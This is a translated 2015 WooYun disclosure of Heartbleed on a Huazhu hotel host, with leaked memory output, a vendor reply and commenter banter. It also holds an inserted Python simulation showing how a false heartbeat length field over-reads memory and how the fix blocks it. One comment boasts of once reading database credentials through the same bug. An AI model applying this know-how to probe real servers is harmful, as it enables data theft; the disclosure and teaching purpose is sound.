
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-090041

Title: Heartbleed on a Huazhu site leaks a large number of employee e-mail addresses

Vendor: 汉庭酒店 (Hanting Hotels)

Author: 杀器王子

Submitted: 2015-01-05 12:42

Fixed: 2015-02-19 12:44

Published: 2015-02-19 12:44

Vulnerability type: untimely system/service patching

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-01-05: Details reported to the vendor, awaiting vendor handling
2015-01-05: Vendor has confirmed; details disclosed to the vendor only
2015-01-15: Details disclosed to core white hats and relevant domain experts
2015-01-25: Details disclosed to regular white hats
2015-02-04: Details disclosed to intern white hats
2015-02-19: Details disclosed to the public

Brief description:

Drip, drip.

Detailed description:

lync.huazhu.com is vulnerable to Heartbleed.

python OpenSSL.py
input IP:lync.huazhu.com
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
@SC[r+H9w3f"!98532ED/AI42#0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2251.0 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4|j{!
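The scanner output above reduces to one observation: the server answered a heartbeat with more bytes than the request actually carried. The following is an added example, not part of the original report and not the OpenSSL.py scanner it shows. It models a TLS heartbeat record in pure Python (no network): a vulnerable handler trusts the sender's payload_length field and copies that many bytes out of whatever memory follows the record, while the hardened handler applies the bounds check that the upstream fix introduced (claimed payload plus the 3-byte header and 16-byte padding must fit inside the received record). The "process memory" and the request bytes are constructed for the demonstration.

```python
"""Heartbleed in miniature: why "server returned more data than it should" means vulnerable.

Added example (not the report author's code). Models RFC 6520 heartbeat handling
in pure Python; the heap contents and requests below are constructed inputs.
"""
import struct
from typing import Optional

# Heartbeat message layout (RFC 6520):
#   type (1 byte) | payload_length (2 bytes, big-endian) | payload | padding (>= 16 bytes)
HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING_LEN = 16


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Build a heartbeat request; claimed_length lets the length field disagree with the payload."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * PADDING_LEN


def _response(payload: bytes) -> bytes:
    return struct.pack("!BH", HEARTBEAT_RESPONSE, len(payload)) + payload + b"\x00" * PADDING_LEN


def handle_vulnerable(record: bytes, process_memory: bytes) -> bytes:
    """Pre-fix behaviour: trusts payload_length and copies that many bytes after the header.

    The record sits in a buffer inside a larger heap; whatever follows it (modelled by
    process_memory) is copied into the reply when the claimed length exceeds the record.
    """
    _hb_type, payload_len = struct.unpack("!BH", record[:3])
    heap_view = record + process_memory          # constructed: bytes adjacent to the record
    echoed = heap_view[3:3 + payload_len]        # over-read: no comparison against len(record)
    return _response(echoed)


def handle_fixed(record: bytes, process_memory: bytes) -> Optional[bytes]:
    """Post-fix behaviour: discard any record whose claimed payload does not fit inside it."""
    if len(record) < 3:
        return None                              # too short to even carry a header
    _hb_type, payload_len = struct.unpack("!BH", record[:3])
    if 1 + 2 + payload_len + PADDING_LEN > len(record):
        return None                              # claimed length exceeds record length: drop silently
    echoed = record[3:3 + payload_len]           # now guaranteed to stay inside the record
    return _response(echoed)


def leaks_memory(request: bytes, response: Optional[bytes]) -> bool:
    """Scanner heuristic: a reply longer than the request cannot be a plain echo of it."""
    if response is None:
        return False
    return len(response) > len(request)


def demo() -> dict:
    """Run a legitimate and a malformed heartbeat through both handlers and report the outcome."""
    heap = b"...From: [email protected] To: [email protected]..."  # constructed sample
    honest = build_heartbeat(b"ping")                         # length field matches payload
    malformed = build_heartbeat(b"ping", claimed_length=0x4000)  # claims 16 KiB, sends 4 bytes
    return {
        "honest_vulnerable_leaks": leaks_memory(honest, handle_vulnerable(honest, heap)),
        "malformed_vulnerable_leaks": leaks_memory(malformed, handle_vulnerable(malformed, heap)),
        "malformed_fixed_leaks": leaks_memory(malformed, handle_fixed(malformed, heap)),
        "heap_bytes_in_reply": heap in handle_vulnerable(malformed, heap),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The leaked e-mail addresses in the report are exactly what the over-read returns here: adjacent heap bytes that a correct handler would never have touched. Note that the hardened handler drops a malformed record silently instead of replying with an error, so a scanner that receives nothing back treats the host as not vulnerable.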


Proof of vulnerability:

A large number of internal employee e-mail addresses leaked.

Screenshot: huazhu.jpg

Fix recommendation:

Apply the patch.

Copyright notice: when reposting, please credit 杀器王子@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-01-05 16:04

Vendor reply:

Thank you for the attention; the issue has been handed over to the relevant team for handling.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-01-05 12:44 | 子非海绵宝宝 certified white hat ( core white hat | Rank:1044 vulns:106 | Carry on the spirit of SpongeBob! You're not SpongeBob, how...)

    Front row!

  2. 2015-01-05 12:58 | 苏州同程旅游网络科技有限公司 (WooYun vendor)

    Bro, did you receive that 1K JD gift card? If so, please leave a comment saying you got it; the admin girl needs to confirm that all the white hats received theirs. WooYun: A misconfigured Tongcheng Travel service allows getshell into the intranet and leaks the internal network structure

  3. 2015-01-05 13:10 | 姿势不行 ( passerby | Rank:22 vulns:7 | I'm the little Ali fox who loves acting cute http://www.qinqinyo....)

    @苏州同程旅游网络科技有限公司 Now that's a company with a conscience.

  4. 2015-01-05 13:27 | 大亮 ( regular white hat | Rank:306 vulns:65 | digging holes slowly)

    Nobody on Earth can stop 杀器王子 anymore.

  5. 2015-01-05 13:32 | 鬼色[N.S.T] ( regular white hat | Rank:130 vulns:18 | Leizhou Peninsula)

    How long is this going to keep dripping? Back then I read Huazhu's database account and password straight out of it... Come to think of it, I still haven't received the gift.

  6. 2015-01-05 14:12 | 杀器王子 certified white hat ( regular white hat | Rank:1532 vulns:121 | Sharpening the knife for the pigs and sheep)

    @鬼色[N.S.T] Why want a gift? If they give one, fine; if not, forget it. Earn WB and trade it for an iPhone 6.

  7. 2015-01-05 15:24 | CodeMan ( passerby | Rank:6 vulns:5 | From Jingzhou public security, Hubei)

    @苏州同程旅游网络科技有限公司 The girl is so cute.